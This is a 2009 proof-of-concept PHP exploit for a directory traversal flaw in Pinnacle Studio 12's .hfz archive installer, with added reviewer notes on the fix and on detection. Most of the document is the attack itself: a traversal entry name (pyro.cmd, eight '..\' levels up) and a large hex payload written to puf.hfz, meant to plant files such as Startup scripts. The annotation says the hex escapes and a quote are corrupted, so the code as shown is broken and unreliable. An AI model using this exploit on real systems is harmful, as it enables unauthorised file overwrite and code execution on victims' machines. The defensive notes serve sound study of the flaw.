
pinnaclestudio-traversal.txt

Posted on 14 May 2009

<?php
/*
 * Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory traversal vulnerability poc
 * by Nine:Situations:Group::pyrokinesis
 * Our site: http://retrogod.altervista.org/
 * Software site: http://www.pinnaclesys.com/
 *
 * Some keys exported from the registry (the path separators between key components seem to have
 * been dropped in this copy of the listing, e.g. HKEY_CLASSES_ROOT.hfz is presumably
 * HKEY_CLASSES_ROOT\.hfz -- verify against the original advisory):
 *   [HKEY_CLASSES_ROOT.hfz] @="hfzfile"
 *   [HKEY_CLASSES_ROOT.hfzhfzfile]
 *   [HKEY_CLASSES_ROOT.hfzhfzfileShellNew]
 *   [HKEY_CLASSES_ROOThfzfile] @="Hollywood FX Compressed Archive"
 *   [HKEY_CLASSES_ROOThfzfileDefaultIcon]
 *     @="C:\WINDOWS\Installer\{D041EB9E-890A-4098-8F94-51DA194AC72A}\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"
 *   [HKEY_CLASSES_ROOThfzfileshell]
 *   [HKEY_CLASSES_ROOThfzfileshellOpen]
 *   [HKEY_CLASSES_ROOThfzfileshellOpencommand]
 *     @=""C:\Documents and Settings\All Users.WINDOWS\Documenti\Pinnacle\Content\HollywoodFX\InstallHFZ.exe" "%1""
 *     "command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\n79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\n00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\n70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\n00,22,00,00,00,00,00
 *
 * Usually files are decompressed in a Pinnacle effects folder... Problem is ... that .hfz files can be
 * used to overwrite files on the target system or placing scripts in Startup folders by directory
 * traversal attacks and InstallHFX.exe decompresses them with no prompts!
 * Just modified an existing .hfz file and here it is the dump ...
 * Also I experienced some crashes in doing this... investigating...
 *
 * Review notes (defender's view):
 * - What this script does: it writes one file, puf.hfz, whose contents are a fixed byte blob with
 *   $____path spliced into it. $____path is a relative name made of eight "..\" segments and a
 *   file name. An extractor that joins such a name onto its output directory without normalising
 *   it will create the file outside the intended effects folder, which is the behaviour the author
 *   describes above (archive-entry path traversal, CWE-22).
 * - Where the fix belongs: in the extractor, not in the archive. Resolve each entry name against
 *   the destination directory, canonicalise the result, and refuse to write when it does not stay
 *   inside that directory; reject entries that contain ".." components or absolute/drive-letter
 *   paths before any file is opened. Treat .hfz content as untrusted input, since the registered
 *   shell "Open" command above hands any double-clicked .hfz straight to InstallHFZ.exe.
 * - Detection: the observable effect is InstallHFZ.exe creating files outside the Pinnacle content
 *   folder (the author names Startup folders); file-creation monitoring scoped to that process
 *   would surface it.
 * - Transcription: in this copy the "x.." hex escapes have lost their backslashes and the final
 *   string below has lost its closing quote, so the listing as shown is not syntactically valid
 *   PHP; it is kept byte-for-byte as posted.
 */
// Entry name written into the archive; the leading "..\" segments are the traversal.
$____path = "..\..\..\..\..\..\..\..\pyro.cmd";
// Archive bytes: the first eight escapes spell "HFXZHFXZ" (0x48 0x46 0x58 0x5a, twice), then a few
// length/flag-looking fields, $____path, another short field, and from 0x78 0x9c onward what is
// presumably a zlib-compressed body -- TODO confirm against the format, nothing here parses it.
$____payload = "x48x46x58x5ax48x46x58x5ax9cx07x00x00x49x00x00x00". "x00x21x00x00x00x7e". $____path. "x65x07x00x00xa8x1cx00x00x8dxc2x71x5a". "x78x9cxbdx59x7bx4cx53x57x1cxbex05xf6x10x96x6cx0b". "x33xabx2fx5ax2dxe0xe4xddxd6x84xf2x18xbdx2dx6fx04". "x8axa5x50x44x50xcbx1bx05x8ax3cxb4x22x8ex25x26xcb". "xd4x64xeex8fx2dx9bxcbxe6xd4x2cx21xd3x65x6ex59xa2". "x5bx8cx01x97xa8x89xc1x05xf7xd7xd8x12xcdxc8x12x51". 
"xf7x62xe0x03x5fx77xdfxedx69x2fxb7xb7xb7xb7xe5xb2". "xecxe4x77x2exe7x9ex7bxcexefx7cxf7xfbx3dxcexb9xa5". "xa8xa0x26xbfx28x3fx4fx97x42x51x54x24xaaxd9x54x99". "x5cxd1xdexadx4exd3xe3x86x3axd4xd1x9ax13x45x7ax93". "x2ax4ax51xadx16xb6x5bx41x29x5cx54x71x59xa1x76xf0". "x15x8ax0ax53x84x47xa4xa1x33x16xd5xfbx37x70x79xd3". "xc8xafx76x3bx13x54xaaxabx9fx86x32xecx3fx97x50xd6". "x4dx4cx1cx0ax2ax09x09x6fx48x0fx08x65xa1xaaxaax27". "x16xcbx7dxc8x22xf1x00x4cx7axfax90x46xb3x3bx14xe4". "x44x44x17x6ax69x61x76xeex64x6cxb6xc7x10x09x3cx4c". "x5cx9cx3cx79x1ax1bxcbxbfx95xc6xd3xddxcdx6cxdexcc". "x6cxdcx38x07x7ex9cx4exc6x6ax7dx88x76x40x3cxa9xa9". "xf7x56xaex0cx02x20x21xe1xa1x5ax2dx31x60xe2xccx19". "xbexf8x2fx04x0cxe0x07xd7xcaxcax47x5bxb7x32xa5xa5". "xb3x25x25xffx04xe4x67xfdxfax07x31x31x8fxd7xacx09". "xb4x1cxc0xb0x78xd2xd3xefxafx5ax25x0fx0fx64x60x80". "xb5x17x50xa1x8dx6bx4dx0dx53x5bx1bx00x0fx4dx33x26". "x93xc0x04x44xe6x62x63x87x95x4axc8x1dx70xa8xd5x4a". "xf0x33x7bxedxdax0fxa7x4ex49xe0x81xdbx13x4ex60x3e". "xc2x18xb1x1axdfxc9xe7x75xc6xc7xcfxa9x54xb3xcbx97". "x0bx50x4dxb9xcbx65x9bx6bx9axb0x97x98xc8xacx5dx8b". "xc6xa3xd5xabxfdxf9xf9xf1xf4x69x09x3cx44x0ax0bxff". "x22x60x7ax7ax3cx44x01xe7x86x0dx33xe4x29x56xf7x01". "x60x36xb3x0bxe9xf5x5cxe7x6dx77x99xd8xbax7fx9axb3". "xa6xc1xc0x5ex4dx26x51x7bx4dx5dxbcx28x8dx07x02x4b". "x11x5ax9ax9bx59x3cxadxadxecx6dx47x87x78x7cxb1x48". "x52x53xe1xc0x84x01x82xe7x6axcdxc0xb4xc0xbbx32x32". "xf8x2fx12x8axffx08xa4xa8xe8x6fxe0x81xc9xcaxcbxef". "x21x1bx80xb1x80xf1x1ex1fxefx01x96x99x49xf0x7cx91". "xd7x26xc4xc3x49x72x32xaex93x23x23x0bxc5x43x04x90". "x20x68xecxd8xc1x72x25x11xc2x0fxd6xacx99xd1x68x08". "x9exc3x7ax3bxf0xf8x3bx3cxd7xf3xf3xd9xb3x80x71x65". "x78x78xa1x78x88xa5x90x04x48xdcx91xe0x12x8dxe2xdf". "xbax3ex44x58x11x3cxfbxd3x6cx1cx3fxa2x61x48x60x5c". "x3fx77x4ex06x1ex22x34x3dx55x5fxcfx20xa0xe0xc3xac". "xcexecx6cxc1x8bx03x46xd2xd2xd5x04xcfx50x8ax15x78". "x66x96x2dx93x88x77x79xf6xe2x0bxd2x91x27xc9xa8x54". "x82x64x48xf0x70x65xdfx6bx65x7fxa8x54x4fx34x1ax8c". 
// Last chunk, then the write-out: fopen() result is not checked (a failure would only surface as a
// warning from fputs), and the closing quote of this final string is missing in the posted copy,
// so everything up to `?>` is kept exactly as it appeared.
"x14xc5x83x80xadxabx63x75xbax5cx9exd4x27x0fx12x5f". "xe7xddx15x2bx18xa3x91x6fx3bx0excfx50x42xb9xc7x5e". "x08xf3x82x02x7fx3cx44x1bx49x74x48xc2xc8x2dxd8xd0". "x17x89x87x64x39x6cx1cx10x01xa4xb7x12xcax89xdbx60". "x00x1axe4xeax8fx67xefx5exa6xa2xe2xc1xf6xedx32xc9". "x09x18xefx49x49xdcxeex79x43xadxbex2cxd8x6dxe3xe3". "x81x07xb6xf3xc7x63x77x6fx0ax70x4bxd1xb5xf2xf2x7e". "x97x89x87x64xe0x94x14xa9x7dxdfx68x84xcbx71xc0x82". "x2exb4x6bx17x0bx15x3bxbbx1cx3cx71x71xacx17x91xb8". "x93x90xacx2cxcexb2xd2xabx20xbdx60x77x40x86x41x1e". "x16x3dxf9x70x27xccx20x2bx86x2cx12x60xb0x5bxc1xc3". "xe1xeax84x1cx04x20x12x20x4ex65x12x53x2cx96x5bx34". "x7dx2ex3bxfbxebxf0xf0xe7x15x0axc5xf8xf8x38x17x59". "x4axa5xb2x25xc1x66x30x0cxe7xe5x9dxedxefx9fx95xed". "xa8x90xe2xe2x69x72x50x04x1bx88 $_f = fopen("puf.hfz", "w+"); fputs($_f, $____payload); fclose($_f); ?>

 
